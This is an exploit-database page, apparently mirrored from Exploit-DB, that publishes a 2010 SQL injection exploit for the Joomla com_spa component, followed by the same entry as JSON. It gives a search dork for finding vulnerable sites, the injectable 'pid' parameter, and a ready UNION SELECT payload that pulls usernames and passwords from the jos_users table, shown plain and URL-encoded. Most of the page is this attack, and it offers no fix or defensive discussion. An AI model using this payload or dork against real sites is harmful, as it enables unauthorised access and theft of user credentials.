Search...

Joomla Component com_spa SQL Injection Vulnerability

2010-07-20T00:00:00

ID EDB-ID:14423
Type exploitdb
Reporter ALTBTA
Modified 2010-07-20T00:00:00

Description

Joomla Component com_spa SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ====================================================
Joomla Component com_spa SQL Injection Vulnerability
====================================================

Author :   altbta
Email  : [l_9[at]hotmail[dot]com]
Homepage : { www.xp10.com/xp10 }
DORK    :  inurl:"index.php?option=com_spa"
===================================================

[+] Vulnerable File :
http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=[SQL]

[+] ExploiT :
-35 UNION SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13
from jos_users--

[+] Example :
http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35UNION
SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from
jos_users--

[+] Demo :
http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--

JSON Vulners Source

Initial Source

{"hash": "3a417a6cdf8525a7b618bd896a3f07f13434b6752ae5af436ee448b81c233c12", "id": "EDB-ID:14423", "lastseen": "2016-02-01T19:50:13", "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "vulnersScore": 4.3}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/14423/", "description": "Joomla Component com_spa SQL Injection Vulnerability. Webapps exploit for php platform", "title": "Joomla Component com_spa SQL Injection Vulnerability", "sourceData": "====================================================\r\nJoomla Component com_spa SQL Injection Vulnerability\r\n====================================================\r\n\r\nAuthor : altbta\r\nEmail : [l_9[at]hotmail[dot]com]\r\nHomepage : { www.xp10.com/xp10 }\r\nDORK : inurl:\"index.php?option=com_spa\"\r\n===================================================\r\n\r\n[+] Vulnerable File :\r\nhttp://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=[SQL]\r\n\r\n[+] ExploiT :\r\n-35 UNION SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13\r\nfrom jos_users--\r\n\r\n[+] Example :\r\nhttp://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35UNION\r\nSELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from\r\njos_users--\r\n\r\n[+] Demo :\r\nhttp://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--\r\n", "objectVersion": "1.0", "cvelist": [], "published": "2010-07-20T00:00:00", "osvdbidlist": [], "references": [], "reporter": "ALTBTA ", "modified": "2010-07-20T00:00:00", "href": "https://www.exploit-db.com/exploits/14423/"}